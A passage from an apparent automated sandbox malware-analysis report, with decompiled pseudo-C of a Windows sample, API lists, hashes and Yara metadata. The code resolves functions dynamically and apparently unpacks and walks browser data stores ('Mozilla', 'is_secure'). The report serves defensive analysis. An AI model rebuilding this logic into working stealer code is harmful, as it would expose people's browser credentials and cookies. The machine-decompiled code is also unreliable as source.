					}
					_t99 = LoadLibraryA(0x8b543c); // executed
					 *0x8b4838 = _t99;
					__eflags = _t99;
					if(_t99 != 0) {
						 *0x8b484c = GetProcAddress( *0x8b4838, E0082D5C5(E0081412B()));
						_t99 = GetProcAddress( *0x8b4838, E0082D5DA(E0081419F()));
						 *0x8b4818 = _t99;
					}
					return _t99;
				} else {
					 *[fs:0x0] = _v12;
					return _t210;
				}
			}































































                                    0x0081347a
                                    0x0081347f
                                    0x00813484
                                    0x00813487
                                    0x0081348a
                                    0x0081348e
                                    0x00813493
                                    0x00813496
                                    0x00813499
                                    0x008134a0
                                    0x008134a4
                                    0x008134af
                                    0x008134b2
                                    0x008134b7
                                    0x008134bb
                                    0x008134bd
                                    0x008134c0
                                    0x008134c3
                                    0x008134c5
                                    0x008134c5
                                    0x008134ce
                                    0x008134d5
                                    0x008134d7
                                    0x008134dc
                                    0x008134e1
                                    0x008134e7
                                    0x00813501
                                    0x00813506
                                    0x0081350a
                                    0x00813513
                                    0x00813514
                                    0x00813515
                                    0x00813517
                                    0x0081351e
                                    0x00813520
                                    0x00813525
                                    0x00813526
                                    0x0081352d
                                    0x00813534
                                    0x00813537
                                    0x0081353d
                                    0x00813544
                                    0x00813549
                                    0x00813550
                                    0x00813551
                                    0x00813560
                                    0x00813561
                                    0x00813562
                                    0x00813563
                                    0x00813568
                                    0x0081356f
                                    0x00813574
                                    0x00813551
                                    0x00813575
                                    0x0081357b
                                    0x0081357d
                                    0x0081357f
                                    0x0081357f
                                    0x00813586
                                    0x00813587
                                    0x00813587
                                    0x0081357f
                                    0x00813591
                                    0x0081359d
                                    0x0081359f
                                    0x008135a1
                                    0x008135a3
                                    0x008135a8
                                    0x008135ab
                                    0x008135ad
                                    0x008135af
                                    0x008135af
                                    0x008135b3
                                    0x008135b4
                                    0x008135b4
                                    0x008135af
                                    0x008135bd
                                    0x008135bd
                                    0x008135c2
                                    0x008135c5
                                    0x008135ca
                                    0x008135d1
                                    0x008135d8
                                    0x008135de
                                    0x008135e2
                                    0x008135e8
                                    0x008135ef
                                    0x008135f4
                                    0x008135fb
                                    0x008135fc
                                    0x0081360b
                                    0x0081360c
                                    0x0081360d
                                    0x0081360f
                                    0x00813610
                                    0x00813615
                                    0x0081361c
                                    0x00813627
                                    0x008135fc
                                    0x00813628
                                    0x0081362e
                                    0x00813630
                                    0x00813632
                                    0x00813632
                                    0x00813639
                                    0x0081363a
                                    0x0081363a
                                    0x00813632
                                    0x00813644
                                    0x0081364a
                                    0x0081364c
                                    0x0081364e
                                    0x00813660
                                    0x00813665
                                    0x0081366a
                                    0x0081366d
                                    0x0081366f
                                    0x00813671
                                    0x00813671
                                    0x00813675
                                    0x00813676
                                    0x00813676
                                    0x00813671
                                    0x0081367f
                                    0x00813684
                                    0x00813689
                                    0x0081368c
                                    0x0081368e
                                    0x00813690
                                    0x00813690
                                    0x00813694
                                    0x00813695
                                    0x00813695
                                    0x00813690
                                    0x0081369e
                                    0x008136b3
                                    0x008136b3
                                    0x008136b8
                                    0x008136bb
                                    0x008136c0
                                    0x008136c7
                                    0x008136ce
                                    0x008136d5
                                    0x008136d9
                                    0x008136df
                                    0x008136e6
                                    0x008136eb
                                    0x008136f2
                                    0x008136f3
                                    0x00813702
                                    0x00813703
                                    0x00813704
                                    0x00813705
                                    0x00813706
                                    0x0081370b
                                    0x00813712
                                    0x00813717
                                    0x0081371a
                                    0x008136f3
                                    0x0081371b
                                    0x00813721
                                    0x00813723
                                    0x00813725
                                    0x00813725
                                    0x0081372c
                                    0x0081372d
                                    0x0081372d
                                    0x00813725
                                    0x00813737
                                    0x0081373d
                                    0x00813742
                                    0x00813744
                                    0x0081374a
                                    0x0081374f
                                    0x00813752
                                    0x00813754
                                    0x00813756
                                    0x00813756
                                    0x0081375a
                                    0x0081375b
                                    0x0081375b
                                    0x00813756
                                    0x0081376f
                                    0x00813789
                                    0x008137a3
                                    0x008137a8
                                    0x008137ad
                                    0x008137b0
                                    0x008137b2
                                    0x008137b4
                                    0x008137b4
                                    0x008137b8
                                    0x008137b9
                                    0x008137b9
                                    0x008137b4
                                    0x008137c7
                                    0x008137cc
                                    0x008137d1
                                    0x008137d4
                                    0x008137d6
                                    0x008137d8
                                    0x008137d8
                                    0x008137dc
                                    0x008137dd
                                    0x008137dd
                                    0x008137d8
                                    0x008137eb
                                    0x008137eb
                                    0x008137f0
                                    0x008137f5
                                    0x008137fc
                                    0x00813803
                                    0x00813809
                                    0x0081380f
                                    0x00813816
                                    0x0081381b
                                    0x00813822
                                    0x00813823
                                    0x00813832
                                    0x00813833
                                    0x00813834
                                    0x00813836
                                    0x0081383b
                                    0x00813842
                                    0x00813847
                                    0x0081384a
                                    0x00813823
                                    0x0081384b
                                    0x00813851
                                    0x00813853
                                    0x00813855
                                    0x00813855
                                    0x0081385c
                                    0x0081385d
                                    0x0081385d
                                    0x00813855
                                    0x00813867
                                    0x0081386d
                                    0x00813872
                                    0x00813874
                                    0x0081387a
                                    0x0081387f
                                    0x00813882
                                    0x00813884
                                    0x00813886
                                    0x00813886
                                    0x0081388a
                                    0x0081388b
                                    0x0081388b
                                    0x00813886
                                    0x0081389f
                                    0x008138b9
                                    0x008138d3
                                    0x008138d8
                                    0x008138dd
                                    0x008138e0
                                    0x008138e2
                                    0x008138e4
                                    0x008138e4
                                    0x008138e8
                                    0x008138e9
                                    0x008138e9
                                    0x008138e4
                                    0x008138f7
                                    0x00813911
                                    0x0081392b
                                    0x0081392b
                                    0x00813930
                                    0x00813935
                                    0x0081393c
                                    0x00813943
                                    0x0081394a
                                    0x0081394e
                                    0x00813954
                                    0x0081395b
                                    0x00813960
                                    0x00813967
                                    0x00813968
                                    0x00813977
                                    0x00813978
                                    0x00813979
                                    0x0081397a
                                    0x0081397b
                                    0x00813980
                                    0x00813987
                                    0x0081398c
                                    0x00813968
                                    0x0081398d
                                    0x00813993
                                    0x00813995
                                    0x00813995
                                    0x0081399c
                                    0x0081399d
                                    0x0081399d
                                    0x00813995
                                    0x008139a7
                                    0x008139ad
                                    0x008139b2
                                    0x008139b4
                                    0x008139d1
                                    0x008139e9
                                    0x008139eb
                                    0x008139eb
                                    0x008139f4
                                    0x008134e9
                                    0x008134f1
                                    0x008134f9
                                    0x008134f9

                                    APIs
                                      • Part of subcall function 0082DE34: _wmemset.LIBCMT ref: 0082DE63
                                    • ___std_fs_get_current_path@8.LIBCPMT ref: 008134C9
                                      • Part of subcall function 00812839: __EH_prolog2.LIBCMT ref: 00812840
                                    • LoadLibraryA.KERNELBASE(008B52C4,?,00000008), ref: 00813591
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 008135BB
                                    • LoadLibraryA.KERNELBASE(008B5268,?,00000008), ref: 00813644
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0081365E
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0081367D
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0081369C
                                    • LoadLibraryA.KERNEL32(008B508C,?,00000008), ref: 00813737
                                    • GetProcAddress.KERNEL32(00000000), ref: 0081376D
                                    • GetProcAddress.KERNEL32(00000000), ref: 00813787
                                    • GetProcAddress.KERNEL32(00000000), ref: 008137A1
                                    • GetProcAddress.KERNEL32(00000000), ref: 008137C5
                                    • LoadLibraryA.KERNEL32(008B4D40,?,00000008), ref: 00813867
                                    • GetProcAddress.KERNEL32(00000000), ref: 0081389D
                                    • GetProcAddress.KERNEL32(00000000), ref: 008138B7
                                    • GetProcAddress.KERNEL32(00000000), ref: 008138D1
                                    • GetProcAddress.KERNEL32(00000000), ref: 008138F5
                                    • GetProcAddress.KERNEL32(00000000), ref: 0081390F
                                    • GetProcAddress.KERNEL32(00000000), ref: 00813929
                                    • GetProcAddress.KERNEL32(00000000), ref: 008137E9
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 008136B1
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • LoadLibraryA.KERNELBASE(008B543C,?,00000008), ref: 008139A7
                                    • GetProcAddress.KERNEL32(00000000), ref: 008139CF
                                    • GetProcAddress.KERNEL32(00000000), ref: 008139E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$CriticalSection$EnterLeave$ConditionH_prolog2VariableWake___std_fs_get_current_path@8_wmemset
                                    • String ID: .$.$B.$JBB.$LM\W^Z$current_path()
                                    • API String ID: 789720924-918577600
                                    • Opcode ID: f25bcfb2f4a81a8aa069c5d71c2a75b881a2a29c29ee57d594c1b0a6d0afad8b
                                    • Instruction ID: ab7c3d91ca4bdb300294ab107ece596e241dc0cbf0e032bbdccbd70bb9627664
                                    • Opcode Fuzzy Hash: f25bcfb2f4a81a8aa069c5d71c2a75b881a2a29c29ee57d594c1b0a6d0afad8b
                                    • Instruction Fuzzy Hash: 70E126B0A047849ECB15FFB8EC466AD7FA9FF01310B151569E011DB3A3DBB48A84CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00827009 Relevance: 33.3, Strings: 25, Instructions: 2051COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00827009(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t810;
				void* _t817;
				signed int _t820;
				char _t821;
				void* _t825;
				void* _t826;
				void* _t829;
				void* _t832;
				void* _t835;
				intOrPtr _t836;
				intOrPtr* _t839;
				char _t844;
				char _t849;
				intOrPtr _t854;
				intOrPtr _t856;
				intOrPtr _t857;
				void* _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t866;
				void* _t867;
				void* _t869;
				void* _t870;
				void* _t872;
				char _t891;
				char _t895;
				char _t899;
				char _t903;
				signed int _t909;
				char _t910;
				char _t911;
				void* _t913;
				void* _t915;
				void* _t916;
				char _t920;
				signed int _t921;
				char _t922;
				void* _t926;
				void* _t927;
				void* _t929;
				char _t944;
				char _t945;
				char _t946;
				intOrPtr _t950;
				void* _t952;
				void* _t953;
				void* _t954;
				void* _t955;
				void* _t956;
				intOrPtr* _t958;
				char _t970;
				char _t976;
				intOrPtr _t980;
				char _t981;
				char _t987;
				void* _t991;
				intOrPtr _t993;
				char _t994;
				intOrPtr _t996;
				intOrPtr* _t999;
				void* _t1003;
				char _t1005;
				void* _t1010;
				void* _t1017;
				void* _t1024;
				void* _t1031;
				void* _t1038;
				void* _t1045;
				void* _t1049;
				char _t1055;
				char _t1061;
				void* _t1067;
				intOrPtr _t1073;
				void* _t1075;
				intOrPtr _t1076;
				void* _t1079;
				char _t1080;
				intOrPtr _t1081;
				void* _t1083;
				signed int _t1085;
				intOrPtr* _t1088;
				intOrPtr _t1092;
				intOrPtr _t1093;
				void* _t1095;
				intOrPtr _t1098;
				void* _t1099;
				intOrPtr _t1104;
				void* _t1106;
				void* _t1107;
				void* _t1108;
				void* _t1109;
				void* _t1110;
				void* _t1111;
				void* _t1113;
				void* _t1114;
				void* _t1116;
				void* _t1117;
				void* _t1118;
				void* _t1119;
				void* _t1121;
				char _t1143;
				char _t1147;
				char _t1151;
				char _t1156;
				void* _t1165;
				void* _t1171;
				void* _t1172;
				signed int _t1175;
				intOrPtr _t1177;
				void* _t1178;
				void* _t1179;
				void* _t1185;
				signed int _t1188;
				intOrPtr _t1189;
				void* _t1191;
				void* _t1197;
				void* _t1201;
				void* _t1205;
				void* _t1314;
				char _t1317;
				void* _t1337;
				void* _t1338;
				void* _t1392;
				void* _t1394;
				void* _t1396;
				void* _t1398;
				char _t1401;
				intOrPtr _t1427;
				void* _t1428;
				intOrPtr _t1441;
				void* _t1456;
				void* _t1458;
				void* _t1461;
				signed int _t1464;
				void* _t1469;
				void* _t1470;
				char _t1541;
				char _t1543;
				signed int _t1553;
				void* _t1559;
				void* _t1560;
				signed int _t1562;
				signed int _t1569;
				signed int _t1575;
				void* _t1627;
				void* _t1629;
				void* _t1634;
				void* _t1639;
				void* _t1675;
				void* _t1677;
				void* _t1683;
				void* _t1685;
				intOrPtr _t1693;
				void* _t1694;
				intOrPtr _t1698;
				void* _t1724;
				void* _t1725;
				intOrPtr _t1729;
				void* _t1769;
				void* _t1770;
				void* _t1772;
				void* _t1774;
				signed int _t1775;
				signed int _t1779;
				signed int _t1780;
				void* _t1786;
				signed int _t1788;
				void* _t1789;
				signed int _t1796;
				char* _t1797;
				signed int* _t1798;
				signed int _t1799;
				signed int _t1801;
				signed int _t1802;
				char* _t1813;
				signed int _t1814;
				signed int _t1820;
				void* _t1824;
				signed int _t1828;
				void* _t1832;
				void* _t1834;
				intOrPtr _t1835;
				intOrPtr* _t1837;
				void* _t1838;
				intOrPtr* _t1839;
				intOrPtr _t1840;
				void* _t1841;
				char** _t1842;
				void* _t1845;
				intOrPtr* _t1846;
				intOrPtr* _t1847;
				void* _t1848;
				void* _t1849;
				intOrPtr _t1850;
				void* _t1851;
				intOrPtr _t1852;
				void* _t1853;

				_t1299 = __ebx;
				L00890CFC(0x893bfa, __ebx, __ecx, __edx);
				_t1835 = _t1834 - 0x2bc;
				_push(__ebx);
				 *((intOrPtr*)(_t1832 - 0x10)) = _t1835;
				_t1772 = __ecx;
				 *(_t1832 - 0x54) = 0;
				 *(_t1832 - 0x34) = 0;
				_t1700 = _t1832 + 0x20;
				_push( *(_t1832 - 0x34));
				 *((intOrPtr*)(_t1832 - 4)) = 1;
				L0082FEC9(_t1832 + 0x20);
				 *((char*)(_t1832 - 4)) = 2;
				 *((char*)(_t1832 - 0x81)) = E00813174(__ebx, _t1832 - 0x118, __ecx);
				 *((char*)(_t1832 - 4)) = 1;
				L0082DD77(_t1832 - 0x118);
				if( *((char*)(_t1832 - 0x81)) == 0) {
					L191:
					E0082DF41(_t1832 + 8);
					_t810 = E0082DF41(_t1832 + 0x20);
					 *[fs:0x0] =  *((intOrPtr*)(_t1832 - 0xc));
					return _t810;
				} else {
					 *(_t1832 - 0x14c) = 0xf;
					_t1812 = "is_secure";
					 *((intOrPtr*)(_t1832 - 0x150)) = 0;
					 *((char*)(_t1832 - 0x160)) = 0;
					L0082DFE8("is_secure");
					 *((char*)(_t1832 - 4)) = 3;
					L0082DFE8(0x8a7930);
					L0082DFE8("is_secure");
					if(_t1772 == 2) {
						_t1849 = _t1835 - 0x18;
						_t1683 = _t1849;
						 *((intOrPtr*)(_t1683 + 0x10)) = 0;
						 *((intOrPtr*)(_t1683 + 0x14)) = 0;
						E0082E0AB(_t1683, _t1832 + 0x20);
						E00818E25(__ebx, _t1832 - 0x30, _t1700); // executed
						_t1835 = _t1849 + 0x18;
						 *((char*)(_t1832 - 4)) = 4;
						_t1685 = _t1832 + 8;
						if(E0082EA7D(_t1685, "Mozilla", _t1772, _t1812) != 0) {
							_t1770 = 0x10;
							_t1276 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x12)) = 1;
							_t1278 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x13)) = 1;
							_t1280 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x1b)) = 5;
							_t1282 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x2b)) = 2;
							_t1284 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x62)) = 0x24;
							_t1286 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x63)) = 0x80;
							_t1696 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							_t1289 =  *((intOrPtr*)(_t1832 - 0x20)) - 1 + ( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30);
							E0082D990(_t1832 - 0x30, _t1832 - 0x18,  *((intOrPtr*)(_t1832 - 0x20)) - 1 + ( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30));
							_t1852 = _t1835 - 0x18;
							_t1698 = _t1852;
							 *((intOrPtr*)(_t1832 - 0x18)) = _t1852;
							 *((intOrPtr*)(_t1698 + 0x10)) = 0;
							 *((intOrPtr*)(_t1698 + 0x14)) = 0;
							E0082E0AB(_t1698, _t1832 - 0x30);
							_t1853 = _t1852 - 0x18;
							 *((char*)(_t1832 - 4)) = 5;
							_t1685 = _t1853;
							 *((intOrPtr*)(_t1685 + 0x10)) = 0;
							 *((intOrPtr*)(_t1685 + 0x14)) = 0;
							E0082E0AB(_t1685, _t1832 + 0x20);
							 *((char*)(_t1832 - 4)) = 4;
							E00818DC6(_t1770);
							_t1835 = _t1853 + 0x30;
						}
						_push(_t1685);
						if(E0082D960(_t1832 - 0x30, "NULL,secure") != 0xffffffff) {
							_t1769 = 0x10;
							_t1219 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x1b)) = 0xc;
							_t1221 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x23)) = 6;
							_t1223 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x75)) = 0xae;
							_t1225 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0xae)) = 3;
							_t1227 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0xaf)) = 0xfc;
							_t1229 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0xb0)) = 0;
							_t1231 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0xb1)) = 0xab;
							_t1233 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0xae)) = 3;
							_t1235 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x116)) = 3;
							_t1237 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x117)) = 0xfc;
							_t1239 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x118)) = 0;
							_t1241 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x119)) = 0x43;
							_t1243 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x68)) = 4;
							_t1245 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x69)) = 1;
							_t1247 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x6a)) = 0x59;
							_t1249 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x74)) = 0;
							_t1251 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x27)) = 2;
							_t1253 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x2b)) = 6;
							_t1255 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x5f)) = 0xc;
							_t1257 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x61)) = 0x2e;
							_t1259 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x62)) = 0x24;
							_t1261 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							 *((char*)(( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30) + 0x63)) = 0x80;
							_t1690 =  >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30;
							_t1264 =  *((intOrPtr*)(_t1832 - 0x20)) - 1 + ( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30);
							E0082D990(_t1832 - 0x30, _t1832 - 0x18,  *((intOrPtr*)(_t1832 - 0x20)) - 1 + ( >=  ?  *((void*)(_t1832 - 0x30)) : _t1832 - 0x30));
							L0082DFE8("secure");
							_t1850 = _t1835 - 0x18;
							_t1693 = _t1850;
							 *((intOrPtr*)(_t1832 - 0x18)) = _t1850;
							 *((intOrPtr*)(_t1693 + 0x10)) = 0;
							 *((intOrPtr*)(_t1693 + 0x14)) = 0;
							E0082E0AB(_t1693, _t1832 - 0x30);
							_t1851 = _t1850 - 0x18;
							 *((char*)(_t1832 - 4)) = 6;
							_t1694 = _t1851;
							 *((intOrPtr*)(_t1694 + 0x10)) = 0;
							 *((intOrPtr*)(_t1694 + 0x14)) = 0;
							E0082E0AB(_t1694, _t1832 + 0x20);
							 *((char*)(_t1832 - 4)) = 4;
							E00818DC6(_t1769);
							_t1835 = _t1851 + 0x30;
						}
						 *((char*)(_t1832 - 4)) = 3;
						E0082DF41(_t1832 - 0x30);
					}
					_t816 =  >=  ?  *((void*)(_t1832 + 0x20)) : _t1832 + 0x20;
					_t817 = E008559C7( >=  ?  *((void*)(_t1832 + 0x20)) : _t1832 + 0x20, _t1832 - 0xa0); // executed
					_pop(_t1314);
					if(_t817 != 0) {
						L190:
						E00854CEC(_t1314, _t1812,  *((intOrPtr*)(_t1832 - 0xa0))); // executed
						E0082DF41(_t1832 - 0x160);
						goto L191;
					}
					_t1317 = 0;
					_t1813 = 0;
					 *(_t1832 - 0x38) = 0;
					_t1774 = _t1772 - 1;
					if(_t1774 == 0) {
						_t820 = L00828F04();
						__eflags =  *((char*)(_t820 + 0x49));
						if(__eflags == 0) {
							L155:
							_t1701 = _t820;
							_t821 = E0084C9FB( *((intOrPtr*)(_t1832 - 0xa0)), _t820, __eflags, 0xffffffff, 1, _t1832 - 0x38, 0); // executed
							_t1837 = _t1835 + 0x10;
							__eflags = _t821;
							if(_t821 != 0) {
								E0082D9C4("[-] data unpacked failed\n");
								L188:
								_t1812 =  *(_t1832 - 0x38);
								L189:
								E0083EA32(_t1812);
								_pop(_t1314);
								goto L190;
							}
							E0082D9C4("[+] data unpacked\n");
							_t1812 =  *(_t1832 - 0x38);
							while(1) {
								_t825 = E0083EEDB(_t1701, _t1812); // executed
								__eflags = _t825 - 0x64;
								if(_t825 != 0x64) {
									goto L189;
								}
								 *((char*)(_t1832 - 4)) = 7;
								_t826 = E0083F301(_t1812, 0);
								_t1775 = 0xf;
								 *((intOrPtr*)(_t1832 - 0x64)) = 0;
								 *(_t1832 - 0x60) = _t1775;
								 *((char*)(_t1832 - 0x74)) = 0;
								L0082DFE8(_t826);
								 *((char*)(_t1832 - 4)) = 8;
								_t829 = E0083F301(_t1812, 1);
								 *(_t1832 - 0x88) = _t1775;
								 *((intOrPtr*)(_t1832 - 0x8c)) = 0;
								 *((char*)(_t1832 - 0x9c)) = 0;
								L0082DFE8(_t829);
								 *((char*)(_t1832 - 4)) = 9;
								_t832 = E0083F301(_t1812, 2);
								 *(_t1832 - 0xec) = _t1775;
								 *((intOrPtr*)(_t1832 - 0xf0)) = 0;
								 *((char*)(_t1832 - 0x100)) = 0;
								L0082DFE8(_t832);
								 *((char*)(_t1832 - 4)) = 0xa;
								_t835 = E0083F23A(_t1812, 3);
								_t836 = E0083F301(_t1812, 3);
								_pop(_t1337);
								 *((intOrPtr*)(_t1832 - 0x18)) = _t836;
								_t839 = L0082EC6B(_t1299, _t1337, _t1701, __eflags, _t1832 - 0xac, _t1832 + 8, _t835);
								_t1838 = _t1837 - 0x18;
								_t1338 = _t1838;
								 *((intOrPtr*)(_t1338 + 0x10)) = 0;
								 *((intOrPtr*)(_t1338 + 0x14)) = 0;
								E0082E0AB(_t1338,  *_t839 + 0x28);
								E008228AE(_t1299, _t1832 - 0x118,  *((intOrPtr*)(_t1832 - 0x18)), __eflags);
								_t1837 = _t1838 + 0x1c;
								 *((char*)(_t1832 - 4)) = 0xb;
								_t1701 = 0x8a43ab;
								_t844 = E0082EA7D(_t1832 - 0x118, 0x8a43ab, 0x8a43ab, _t1812);
								__eflags = _t844;
								if(_t844 != 0) {
									L186:
									E0082DF41(_t1832 - 0x118);
									E0082DF41(_t1832 - 0x100);
									E0082DF41(_t1832 - 0x9c);
									E0082DF41(_t1832 - 0x74);
									 *((intOrPtr*)(_t1832 - 4)) = 3;
									continue;
								}
								_t849 = E0082EA7D(_t1832 - 0x9c, 0x8a43ab, 0x8a43ab, _t1812);
								__eflags = _t849;
								if(_t849 != 0) {
									E0082DA01(_t1832 - 0x9c, _t1832 - 0x74);
								}
								 *(_t1832 - 0x58) = E0082BA52(_t1299, _t1832 - 0xe0, _t1832 - 0x118);
								 *((char*)(_t1832 - 4)) = 0xc;
								 *((intOrPtr*)(_t1832 - 0x50)) = 0x4f7e0e52;
								 *((intOrPtr*)(_t1832 - 0x4c)) = 0xe145d5d;
								 *((char*)(_t1832 - 0x48)) = 0x2e;
								_t1814 =  *( *[fs:0x2c]);
								_t852 =  *0x8b615c;
								 *(_t1832 - 0x34) = _t1814;
								__eflags =  *0x8b615c -  *((intOrPtr*)(_t1814 + 4));
								if( *0x8b615c >  *((intOrPtr*)(_t1814 + 4))) {
									E0086DB91(_t852, 0x8b615c);
									__eflags =  *0x8b615c - 0xffffffff;
									_pop(_t1398);
									if(__eflags == 0) {
										asm("movsd");
										asm("movsd");
										asm("movsb");
										L0086DFE8(_t1398, __eflags, 0x8961a6);
										 *_t1837 = 0x8b615c;
										L0086DB47();
										_t1814 =  *(_t1832 - 0x34);
									}
								}
								__eflags =  *0x8b5a48;
								if( *0x8b5a48 == 0) {
									L167:
									 *((intOrPtr*)(_t1832 - 0x5c)) = E0082BA52(_t1299, _t1832 - 0x2b0, _t1832 - 0x100);
									 *((char*)(_t1832 - 4)) = 0xd;
									_t854 =  *0x8b4c88; // 0x0
									 *((intOrPtr*)(_t1832 - 0x80)) = 0x41620e52;
									 *((intOrPtr*)(_t1832 - 0x7c)) = 0x14404749;
									 *((short*)(_t1832 - 0x78)) = 0x2e0e;
									__eflags = _t854 -  *((intOrPtr*)(_t1814 + 4));
									if(_t854 >  *((intOrPtr*)(_t1814 + 4))) {
										E0086DB91(_t854, 0x8b4c88);
										__eflags =  *0x8b4c88 - 0xffffffff;
										_pop(_t1396);
										if(__eflags == 0) {
											asm("movsd");
											asm("movsd");
